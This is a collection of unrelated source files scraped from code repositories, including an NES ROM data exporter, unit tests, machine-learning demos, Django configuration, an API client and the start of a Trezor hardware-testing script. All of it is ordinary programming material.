_aggregate_enemy_action_pattern_ids(enemy_group_pattern_list.enemy_group_pattern_ids)\n sum_enemy_group_pattern_ids_count = sum(item[1] for item in enemy_group_pattern_ids_count)\n if sum_enemy_group_pattern_ids_count:\n for enemy_group_pattern_id, count in enemy_group_pattern_ids_count:\n row: List[Union[int, str]] = [\n enemy_group_pattern_list_id,\n enemy_group_pattern_id,\n ]\n rate = f\"{round(count / sum_enemy_group_pattern_ids_count * 100, 2):.02f}% ({count} / {sum_enemy_group_pattern_ids_count})\"\n row.append(rate)\n enemy_group_pattern = _get_enemy_group_pattern(prg_rom_bytes, enemy_group_pattern_id)\n row.append(enemy_group_pattern.enemy_group_size)\n row.append(enemy_group_pattern.enemy_group_0_size + enemy_group_pattern.enemy_group_1_size + enemy_group_pattern.enemy_group_2_size)\n if enemy_group_pattern.enemy_group_0_enemy_id is not None:\n enemy_0_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_0_enemy_id).enemy_name.strip()\n row.append(enemy_0_name)\n row.append(enemy_group_pattern.enemy_group_0_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_1_enemy_id is not None:\n enemy_1_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_1_enemy_id).enemy_name.strip()\n row.append(enemy_1_name)\n row.append(enemy_group_pattern.enemy_group_1_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_2_enemy_id is not None:\n enemy_2_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_2_enemy_id).enemy_name.strip()\n 
row.append(enemy_2_name)\n row.append(enemy_group_pattern.enemy_group_2_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n else:\n # No group patterns in the list.\n row = [\n enemy_group_pattern_list_id,\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _fill_world_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_prg_rom_address = {\n 0x00FCE7: \"ワールドマップ(森(木2本))\",\n 0x00FCE8: \"ワールドマップ(森(木1本))\",\n 0x00FCE9: \"ワールドマップ(??)\",\n 0x00FCEA: \"ワールドマップ(雪木(木1本))\",\n 0x00FCEB: \"ワールドマップ(山(茶色))\",\n 0x00FCEC: \"ワールドマップ(岩山(1マス;進入不可))\",\n 0x00FCED: \"ワールドマップ(雪山(1マス;進入不可))\",\n 0x00FCEE: \"ワールドマップ(平野(緑))\",\n 0x00FCEF: \"ワールドマップ(橋(上から下))\",\n 0x00FCF0: \"ワールドマップ(海(左側が橋の影;進入不可))\",\n 0x00FCF1: \"ワールドマップ(橋(左から右))\",\n 0x00FCF2: \"ワールドマップ(海(上側が橋の影;進入不可))\",\n 0x00FCF3: \"ワールドマップ(沼(緑))\",\n 0x00FCF4: \"ワールドマップ(水(岸なし;進入不可))\",\n 0x00FCF5: \"ワールドマップ(水(上側が岸;進入不可))\",\n 0x00FCF6: \"ワールドマップ(水(上側と左側が岸;進入不可))\",\n 0x00FCF7: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCF8: \"ワールドマップ(??)\",\n 0x00FCF9: \"ワールドマップ(水(下側が岸;進入不可))\",\n 0x00FCFA: \"ワールドマップ(水(左側と下側が岸;進入不可))\",\n 0x00FCFB: \"ワールドマップ(水(下側と右側が岸;進入不可))\",\n 0x00FCFC: \"ワールドマップ(??)\",\n 0x00FCFD: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCFE: \"ワールドマップ(水(右側が岸;進入不可))\",\n 0x00FCFF: \"ワールドマップ(水(上側と下側が岸;進入不可))\",\n 0x00FD00: \"ワールドマップ(水(左側と右側が岸;進入不可))\",\n 0x00FD01: \"ワールドマップ(平野(緑;下側が岸))\",\n 0x00FD02: \"ワールドマップ(砂漠)\",\n 0x00FD03: \"ワールドマップ(??)\",\n 0x00FD04: \"ワールドマップ(ヤシの木)\",\n 0x00FD05: \"ワールドマップ(??)\",\n 0x00FD06: \"ワールドマップ(城壁(進入不可))\",\n 0x00FD07: \"ワールドマップ(スギ(2マスの上))\",\n 0x00FD08: \"ワールドマップ(雪原)\",\n 0x00FD09: \"ワールドマップ(スギ(2マスの下))\",\n 0x00FD0A: \"ワールドマップ(雪原(下側が岸))\",\n 0x00FD0B: \"ワールドマップ(岩山(2マスの左;進入不可))\",\n 0x00FD0C: \"ワールドマップ(岩山(2マスの右;進入不可))\",\n 0x00FD0D: \"ワールドマップ(町(2マス;左))\",\n 0x00FD0E: \"ワールドマップ(町(2マス;右))\",\n 0x00FD0F: \"ワールドマップ(洞窟(はしご))\",\n 0x00FD10: \"ワールドマップ(鳥居)\",\n 0x00FD11: \"ワールドマップ(町(1マス))\",\n 0x00FD12: \"ワールドマップ(氷結城(4マス;左上))\",\n 0x00FD13: \"ワールドマップ(氷結城(4マス;右上))\",\n 0x00FD14: \"ワールドマップ(氷結城(4マス;左下))\",\n 0x00FD15: \"ワールドマップ(氷結城(4マス;右下))\",\n 0x00FD16: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左上))\",\n 0x00FD17: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右上))\",\n 0x00FD18: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左下))\",\n 0x00FD19: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右下))\",\n 0x00FD1A: \"ワールドマップ(町跡地)\",\n 0x00FD1B: \"オニガランド(森(木1本))\",\n 0x00FD1C: \"オニガランド(??)\",\n 0x00FD1D: \"オニガランド(平野(茶))\",\n 0x00FD1E: \"オニガランド(森(幹無し))\",\n 0x00FD1F: \"オニガランド(森(木2本))\",\n 0x00FD20: \"オニガランド(平野(緑))\",\n 0x00FD21: \"オニガランド(??)\",\n 0x00FD22: \"オニガランド(??)\",\n 0x00FD23: \"オニガランド(??)\",\n 0x00FD24: \"オニガランド(??)\",\n 0x00FD25: \"オニガランド(??)\",\n 0x00FD26: \"オニガランド(水(岸なし))\",\n 0x00FD27: \"オニガランド(水(上側が岸))\",\n 0x00FD28: \"オニガランド(水(上側と左側が岸))\",\n 0x00FD29: \"オニガランド(水(上側と右側が岸))\",\n 0x00FD2A: \"オニガランド(??)\",\n 0x00FD2B: \"オニガランド(水(下側が岸))\",\n 0x00FD2C: \"オニガランド(水(左側と下側が岸))\",\n 0x00FD2D: \"オニガランド(水(下側と右側が岸))\",\n 0x00FD2E: \"オニガランド(??)\",\n 0x00FD2F: \"オニガランド(水(左側が岸))\",\n 0x00FD30: \"オニガランド(水(右側が岸))\",\n 0x00FD31: \"オニガランド(水(上側と下側が岸))\",\n 0x00FD32: \"オニガランド(水(左側と右側が岸))\",\n 0x00FD33: \"オニガランド(平野(茶;下側が岸))\",\n 0x00FD34: \"オニガランド(トゲ)\",\n 0x00FD35: \"オニガランド(溶岩)\",\n 0x00FD36: \"オニガランド(??)\",\n 0x00FD37: \"オニガランド(??)\",\n 0x00FD38: \"オニガランド(??)\",\n 0x00FD39: \"オニガランド(??)\",\n 0x00FD3A: \"オニガランド(??)\",\n 0x00FD3B: \"オニガランド(??)\",\n 0x00FD3C: \"オニガランド(??)\",\n 
0x00FD3D: \"オニガランド(??)\",\n 0x00FD3E: \"オニガランド(??)\",\n 0x00FD3F: \"オニガランド(??)\",\n 0x00FD40: \"オニガランド(??)\",\n 0x00FD41: \"オニガランド(??)\",\n 0x00FD42: \"オニガランド(??)\",\n 0x00FD43: \"オニガランド(??)\",\n 0x00FD44: \"オニガランド(??)\",\n 0x00FD45: \"オニガランド(??)\",\n 0x00FD46: \"オニガランド(??)\",\n 0x00FD47: \"オニガランド(??)\",\n 0x00FD48: \"オニガランド(??)\",\n 0x00FD49: \"オニガランド(??)\",\n 0x00FD4A: \"オニガランド(??)\",\n 0x00FD4B: \"オニガランド(??)\",\n 0x00FD4C: \"オニガランド(??)\",\n 0x00FD4D: \"オニガランド(??)\",\n 0x00FD4E: \"オーロラ王国(雪原)\",\n 0x00FD4F: \"オーロラ王国(雪原(下側が岸))\",\n 0x00FD50: \"オーロラ王国(??)\",\n 0x00FD51: \"オーロラ王国(??)\",\n 0x00FD52: \"オーロラ王国(??)\",\n 0x00FD53: \"オーロラ王国(??)\",\n 0x00FD54: \"オーロラ王国(土)\",\n 0x00FD55: \"オーロラ王国(??)\",\n 0x00FD56: \"オーロラ王国(??)\",\n 0x00FD57: \"オーロラ王国(??)\",\n 0x00FD58: \"オーロラ王国(??)\",\n 0x00FD59: \"オーロラ王国(??)\",\n 0x00FD5A: \"オーロラ王国(??)\",\n 0x00FD5B: \"オーロラ王国(??)\",\n 0x00FD5C: \"オーロラ王国(??)\",\n 0x00FD5D: \"オーロラ王国(??)\",\n 0x00FD5E: \"オーロラ王国(??)\",\n 0x00FD5F: \"オーロラ王国(??)\",\n 0x00FD60: \"オーロラ王国(??)\",\n 0x00FD61: \"オーロラ王国(??)\",\n 0x00FD62: \"オーロラ王国(??)\",\n 0x00FD63: \"オーロラ王国(??)\",\n 0x00FD64: \"オーロラ王国(土(下側が岸))\",\n 0x00FD65: \"オーロラ王国(??)\",\n 0x00FD66: \"オーロラ王国(??)\",\n 0x00FD67: \"オーロラ王国(階段)\",\n 0x00FD68: \"オーロラ王国(??)\",\n 0x00FD69: \"オーロラ王国(??)\",\n 0x00FD6A: \"オーロラ王国(??)\",\n 0x00FD6B: \"オーロラ王国(??)\",\n 0x00FD6C: \"オーロラ王国(??)\",\n 0x00FD6D: \"オーロラ王国(??)\",\n 0x00FD6E: \"オーロラ王国(??)\",\n 0x00FD6F: \"オーロラ王国(??)\",\n 0x00FD70: \"オーロラ王国(??)\",\n 0x00FD71: \"オーロラ王国(??)\",\n 0x00FD72: \"オーロラ王国(??)\",\n 0x00FD73: \"オーロラ王国(??)\",\n 0x00FD74: \"オーロラ王国(??)\",\n 0x00FD75: \"オーロラ王国(??)\",\n 0x00FD76: \"オーロラ王国(??)\",\n 0x00FD77: \"オーロラ王国(??)\",\n 0x00FD78: \"オーロラ王国(??)\",\n 0x00FD79: \"オーロラ王国(??)\",\n 0x00FD7A: \"オーロラ王国(??)\",\n 0x00FD7B: \"オーロラ王国(??)\",\n 0x00FD7C: \"オーロラ王国(??)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップ説明・マス説明\"),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for prg_rom_address in range(0x00FCE7, 0x00FD7C + 1):\n encounter_threshold_id = prg_rom_bytes[prg_rom_address]\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [description_by_prg_rom_address[prg_rom_address], encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input_ines_file_path\", type=str)\n parser.add_argument(\"output_excel_file_path\", type=str)\n args = parser.parse_args()\n\n prg_rom_bytes = _read_prg_rom(args.input_ines_file_path)\n expected_prg_rom_crc = 0x29C61B41\n if binascii.crc32(prg_rom_bytes) != expected_prg_rom_crc:\n raise ValueError(\"Unexpected PRG ROM CRC\")\n\n workbook = openpyxl.Workbook()\n workbook.active.title = \"味方キャラステータス\"\n _fill_player_character(prg_rom_bytes, workbook.active)\n _fill_enemy(prg_rom_bytes, workbook.create_sheet(\"敵キャラステータス\"))\n _fill_map(prg_rom_bytes, workbook.create_sheet(\"マップ\"))\n _fill_world_map(prg_rom_bytes, workbook.create_sheet(\"ワールドマップ\"))\n _fill_enemy_group_pattern_list(prg_rom_bytes, workbook.create_sheet(\"敵グループパターンリスト\"))\n workbook.save(args.output_excel_file_path)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"applemon8080/jvq-analysis","sub_path":"jvqdump.py","file_name":"jvqdump.py","file_ext":"py","file_size_in_byte":73446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72625409927","text":"import unittest\nfrom pyz80.iobus import *\nfrom unittest import mock\n\nclass TestIOBus(unittest.TestCase):\n def test_read(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n devices[n].read.side_effect = lambda a : a + n\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n self.assertEqual(a+n, UUT.read(n, a))\n devices[n].read.assert_called_once_with(a)\n for device in devices:\n if device != devices[n]:\n device.read.assert_not_called()\n\n def test_write(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n UUT.write(n, a, mock.sentinel.data)\n devices[n].write.assert_called_once_with(a, mock.sentinel.data)\n for device in devices:\n if device != devices[n]:\n device.write.assert_not_called()\n\nclass TestDevice(unittest.TestCase):\n def test_responds_to_port(self):\n UUT = Device()\n for n in range(0,256):\n self.assertFalse(UUT.responds_to_port(n))\n\n def test_read(self):\n UUT = Device()\n for a in range(0,256):\n self.assertEqual(0x00, UUT.read(a))\n\n def test_write(self):\n UUT = Device()\n for a in range(0,256):\n UUT.write(a, mock.sentinel.data)\n","repo_name":"jamespbarrett/pyz80","sub_path":"tests/test_iobus.py","file_name":"test_iobus.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"18896582886","text":"\"\"\"Напишите программу, в которой вычисляется факториал числа.\nФакториалом n! числа n называется произведение всех чисел от единицы\nдо этого числа: n! = 1 Г 2 Г 3 Г … Г n. Число, для которого вычисляется\nфакториал, вводится пользователем с клавиатуры.\"\"\"\n\nn = input(\"Введите число: \")\n\nif not n.isdigit():\n print(\"Неверный ввод!\")\n exit()\n\nfactorial = 1\nfor i in range(1, int(n) + 1):\n factorial *= i\n\nprint(f\"{n}! = {factorial}\")\n","repo_name":"widgeton/PythonExercises","sub_path":"01.Acquaintance/01.07.py","file_name":"01.07.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"840902074","text":"#%%\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\n\n#%%\n# SUMMARY OF LOGISTIC REGRESSION MODEL:\n# ---------------------------------------------\n# 1. Create a model with LogisticRegression().\n# 2. Train the model with model.fit().\n# 3. Make predictions with model.predict().\n# 4. Validate the model with accuracy_score(). \n\n#%%\nX, y = make_blobs(centers=2, random_state=42)\n\nprint(f\"Labels: {y[:10]}\")\nprint(f\"Data: {X[:10]}\")\n# %%\nplt.scatter(X[:, 0], X[:, 1], c=y)\n\n# %%\n# Training and testing the model\nX_train, X_test, y_train, y_test = train_test_split(X,\n y, random_state=1, stratify=y)\n# %%\n# Instantiate a Logistic Regression Model\n\nclassifier = LogisticRegression(solver='lbfgs', random_state=1)\nclassifier\n\nLogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,\n intercept_scaling=1, l1_ratio=None, max_iter=100,\n multi_class='warn', n_jobs=None, penalty='12',\n random_state=1, solver='lbfgs', tol=0.0001, verbose=0,\n warm_start=False)\n# %%\n# Train the Logistic Regression model\nclassifier.fit(X_train, y_train)\n\n#%%\n# Validate the logistic regression model\npredictions = classifier.predict(X_test)\npd.DataFrame({\"Prediction\": predictions, \"Actual\": y_test})\n# Evaluate the performance of the predictions\naccuracy_score(y_test, predictions)\n\n#%%\n# Classify if the next point is purple or yellow\nnew_data = np.array([[-2, 6]])\nplt.scatter(X[:, 0], X[:, 1], c=y)\nplt.scatter(new_data[0, 0], new_data[0, 1], c=\"r\", marker=\"o\", s=100)\nplt.show()\n# %%\npredictions = classifier.predict(new_data)\nprint(\"Classes are either 0 (purple) or 1 (yellow)\")\nprint(f\"The new point was classified as: {predictions}\")\n# %%\n","repo_name":"ines-tb/MachineLearning-analysis","sub_path":"logistic_regression/demo/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1512611402","text":"from django.conf.urls.defaults import patterns, url, include\nfrom django.contrib import admin\n\nfrom transmogrifier.settings import MEDIA_ROOT\nfrom messportal import urls\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n \n url(r'^media/(?P.*)$',\n 'django.views.static.serve',\n { 'document_root': MEDIA_ROOT }),\n\n url(r'^admin/',\n include(admin.site.urls)\n ),\n\n url(r'^',\n include('transmogrifier.messportal.urls')\n ),\n )\n","repo_name":"s-ramaswamy/transmogrifier","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"3094468591","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.red),#Redirect from startpage\n url(r'^admin/', admin.site.urls),#standart adminpanel\n url(r'^index/', include('index.urls')),#index app\n url(r'^metrics/', include('metrics.urls')),#metrics app\n url(r'^auth/', include('auth.urls')),#auth app\n url(r'^books/', include('books.urls')),#books app\n]\n","repo_name":"ptera-py/hlaf","sub_path":"hlaf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17363648724","text":"import pickle\nfrom pathlib import Path\nfrom typing import List\n\nimport click\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import Trainer\n\nfrom src.data_loading.load_augsburg15 import Augsburg15Dataset, collate_augsburg15_detection\nimport torch\n\nfrom src.models.soft_teacher import SoftTeacher\n\n\ndef _get_evaluation_data_loader(evaluation_dataset_name):\n root_directory, image_info_csv, dataset_type = Augsburg15Dataset.DATASET_MAPPING[evaluation_dataset_name]\n dataset = Augsburg15Dataset(\n root_directory=root_directory,\n image_info_csv=image_info_csv,\n transforms=[],\n dataset_type=dataset_type,\n )\n return DataLoader(\n dataset,\n batch_size=1,\n collate_fn=collate_augsburg15_detection,\n drop_last=True,\n num_workers=4\n )\n\n\ndef _make_validation_predictions(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1,\n train_dataset=None,\n validation_dataset=None,\n test_dataset=None,\n )\n model.eval()\n device = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')\n model.to(device)\n\n results = []\n\n for index, sample in enumerate(data_loader):\n image, target = sample\n\n image = image.to(device)\n\n result = model(image)\n results.append(\n (result[0]['boxes'].detach().cpu(), result[0]['labels'].detach().cpu(), result[0]['scores'].detach().cpu()))\n\n with open(checkpoint_path.parent / f'predictions_{evaluation_dataset_name}.pkl', 'wb') as file:\n pickle.dump(results, file)\n\n\ndef _run_test_set(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1\n )\n\n trainer = Trainer(\n gpus=1 if torch.cuda.is_available() else 0,\n precision=16,\n )\n results = trainer.test(\n model,\n dataloaders=data_loader,\n ckpt_path=checkpoint_path\n )\n with open(checkpoint_path.parent / f'results_{evaluation_dataset_name}.pkl', 'w') as file:\n file.write(str(results))\n\n\ndef _run_evaluation_for_experiment(\n ckpt_path: Path,\n evaluation_datasets: List[str]\n):\n ckpt_path = Path(ckpt_path)\n for evaluation_dataset in evaluation_datasets:\n _make_validation_predictions(ckpt_path, evaluation_dataset)\n _run_test_set(ckpt_path, evaluation_dataset)\n\n\n@click.command()\n@click.option(\n '--checkpoint_path',\n required=True,\n multiple=True,\n help='Which checkpoints to use for evaluation.'\n)\n@click.option(\n '--evaluation_dataset_group',\n default='evaluate_2016augsburg15',\n help='Which datasets to use for evaluation.'\n)\ndef run_evaluation_for_experiments(\n checkpoint_path,\n evaluation_dataset_group: str\n):\n if evaluation_dataset_group == 'evaluate_2016augsburg15':\n evaluation_datasets = [\n 'validation_synthesized_2016_augsburg15',\n 'test_synthesized_2016_augsburg15',\n 'test_synthesized_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_raw':\n evaluation_datasets = [\n 'validation_raw_2016_2018_augsburg15',\n 'test_raw_2016_2018_augsburg15',\n 'test_raw_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_synthesised':\n evaluation_datasets = [\n 'validation_synthesized_2016_2018_augsburg15',\n 'test_synthesized_2016_2018_augsburg15',\n 'test_synthesized_manual_set'\n ]\n else:\n 
raise ValueError(f'No such evaluation_dataset_group: {evaluation_dataset_group}')\n\n for ckpt_path in checkpoint_path:\n _run_evaluation_for_experiment(ckpt_path, evaluation_datasets)\n\n\nif __name__ == '__main__':\n run_evaluation_for_experiments()\n","repo_name":"MilesGrey/ssl-pollen-detection","sub_path":"run_evaluation.py","file_name":"run_evaluation.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"44942357341","text":"import os\nimport json\nimport pickle as pkl\nfrom collections import defaultdict, Counter\n\nimport numpy as np\nfrom tqdm import tqdm\n\nimport read_ap\nimport download_ap\n\nfrom gensim_corpus import GensimCorpus, BOWCorpus, TFIDFCorpus, ModelCorpus\nfrom gensim.models import LdaModel\nfrom gensim.matutils import kullback_leibler, sparse2full\n\nfrom trec import TrecAPI\n\nimport argparse\n\nclass LatentDirichletAllocation():\n \"\"\"\n This class implements latent dirichlet allocation using the gensim library.\n \"\"\"\n def __init__(self, corpus, num_topics=500, iterations=2000, passes=20, eval_every=None, embedding=\"bow\"):\n\n self.lda_model_path = \"./saved_models/gensim-lda-model-nt-{}.mm\".format(num_topics)\n self.lda_corpus_path = \"./saved_models/gensim-lda-nt-{}-corpus.crp\".format(num_topics)\n\n self.index_path = \"./saved_models/gensim-lda-model.pkl\"\n self.lda_corpus_path = \"./saved_models/gensim-lda-corpus.crp\"\n\n self.corpus = corpus\n self.num_topics = num_topics\n self.lda_corpus = []\n\n if os.path.exists(self.lda_model_path):\n print(\"LDA model already trained, loading from disk.\")\n self.model = LdaModel.load(self.lda_model_path)\n\n else:\n\n # Make a index to word dictionary.\n temp = corpus.dictionary[0] # This is only to \"load\" the dictionary.\n id2word = corpus.dictionary.id2token\n\n print(\"Training LDA model.\")\n self.model = LdaModel(\n corpus=list(corpus.get_corpus()),\n id2word=id2word,\n iterations=iterations,\n num_topics=num_topics,\n eval_every=eval_every\n )\n\n self.model.save(self.lda_model_path)\n\n self.lda_corpus = ModelCorpus(corpus.get_corpus(), self.model, path=self.lda_corpus_path, persist=True)\n\n self.lda_corpus_pers = [sparse2full(doc, self.num_topics) for doc in self.lda_corpus]\n\n def search(self, query):\n\n query_repr = read_ap.process_text(query)\n vec_query = self.corpus.dictionary.doc2bow(query_repr)\n lda_query = sparse2full(self.model[vec_query], self.num_topics)\n\n results = defaultdict(float)\n for doc_id, lda_doc_repr in zip(self.corpus.doc_ids, self.lda_corpus_pers):\n results[doc_id] = kullback_leibler(lda_query, lda_doc_repr)\n\n results = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}\n return list(results.items())\n\nif __name__ == \"__main__\":\n\n os.makedirs(\"results\", exist_ok=True)\n os.makedirs(\"saved_models/sim_temps\", exist_ok=True)\n os.makedirs(\"raw_output\", exist_ok=True)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-embedding\", type=str, default=\"tfidf\", help=\"Embedding to use in training LDA.\")\n parser.add_argument(\"-num_topics\", type=int, default=500, help=\"Number of topics to use in training LDA.\")\n args = parser.parse_args()\n\n num_topics = args.num_topics\n # ensure dataset is downloaded\n download_ap.download_dataset()\n # pre-process the text\n docs_by_id = None\n docs_by_id = read_ap.get_processed_docs()\n\n gensim_corpus = GensimCorpus(docs_by_id, args.embedding)\n\n lda = LatentDirichletAllocation(gensim_corpus, eval_every=None, num_topics=num_topics, embedding=args.embedding)\n\n # read in the qrels\n qrels, queries = read_ap.read_qrels()\n\n overall_ser = {}\n\n print(\"Running LDA benchmark\")\n\n # Write results to trec-style file\n if not os.path.exists(\"lda_results.out\"):\n\n # collect results\n for qid in tqdm(qrels):\n query_text = queries[qid]\n\n results = lda.search(query_text)\n overall_ser[qid] = dict(results)\n\n results_lines = []\n for qid in overall_ser:\n for 
doc_id in overall_ser[qid]:\n results_lines.append(str(qid) + '\\tQO\\t' + doc_id + '\\t0\\t' + str(overall_ser[qid][doc_id]) + '\\tSTANDARD\\n')\n with open('./raw_output/lda_results.out', 'w') as f:\n f.writelines(results_lines)\n\n trec = TrecAPI('D:/Google Drive/Documenten/UVA/MSc AI/Information Retrieval 1/trec_eval-master/trec_eval.exe')\n metrics = trec.evaluate(test_file_name='datasets/ap/qrels.tsv', prediction_file_name='./raw_output/lda_results.out', metrics_to_capture={'map', 'ndcg'})\n\n # dump this to JSON\n # *Not* Optional - This is submitted in the assignment!\n with open(\"./results/lda-{}-topics.json\".format(num_topics), \"w\") as writer:\n json.dump(metrics, writer, indent=1)","repo_name":"davidvos/master-projects","sub_path":"information-retrieval/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"31211244358","text":"import logging\n\nfrom csm_api_client.service.gateway import APIError, APIGatewayClient\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass JobstatClient(APIGatewayClient):\n base_resource_path = 'statechecker/jobstat/'\n\n def get_all(self):\n \"\"\"Get all results from Job State Checker.\n\n Returns:\n A list of dictionaries where each dictionary pertains to a\n single job.\n\n Raises:\n APIError: if there is a failure querying the Job State Checker API\n or getting the required information from the response.\n \"\"\"\n err_prefix = 'Failed to get State Checker data'\n try:\n response = self.get('all').json()\n return response['jobstat']\n except APIError as err:\n raise APIError(f'{err_prefix}: {err}')\n except ValueError as err:\n raise APIError(f'{err_prefix} due to bad JSON in response: {err}')\n except KeyError as err:\n raise APIError(f'{err_prefix} due to missing {err} key in response.')\n","repo_name":"Cray-HPE/sat","sub_path":"sat/apiclient/jobstat.py","file_name":"jobstat.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"25315972081","text":"from django.shortcuts import render\nfrom models import Bride, Groom, Party,Venue\n\n# Create your views here.\n\ndef get_index(request):\n brides=Bride.objects.filter()\n bride=brides[0]\n grooms=Groom.objects.filter()\n groom=grooms[0]\n party=Party.objects.filter()\n venues=Venue.objects.filter()\n\n return render(request, 'homepage.html',{'bride':bride,'groom':groom,'party':party,'venues':venues})","repo_name":"Cvd2014/LeahWedding","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42423516753","text":"#!/usr/bin/env -S python3 -u\n# This is just a dirty playground, do not use.\n# It will be refactored over time.\n\nimport os\nimport sys\nimport serial\nimport time\nimport yaml\nimport datetime\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.safe_load(ymlfile)\n\nuhub_loction = cfg['usb_location'];\nuhub_port = cfg['usb_port'];\narduino_serial = cfg['arduino_serial'];\n\ndef trezor_poweroff():\n now();\n print(\"[hardware/usb] Turning power off...\");\n os.system((\"uhubctl -l {} -p {} -r 100 -a off > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef trezor_poweron():\n now();\n print(\"[hardware/usb] Turning power on...\");\n os.system((\"uhubctl -l {} -p {} -a on > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef touch(ser, location, action):\n now();\n print(\"[hardware/trezor] Touching the {} button by {}...\".format(location, action));\n ser.write((\"{} {}\\n\".format(location, action)).encode())\n\ndef wait(seconds):\n now();\n print(\"[software] Waiting for {} seconds...\".format(seconds));\n time.sleep(seconds);\n\ndef now():\n print(\"\\n[timestamp] {}\".format(datetime.datetime.now()));\n\ndef update_firmware(ser, version):\n if \"http\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -u {} &\".format(version);\n elif \"bin\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -f {} &\".format(version);\n else:\n unofficial = False;\n trezorctlcmd = \"trezorctl firmware-update -v {} 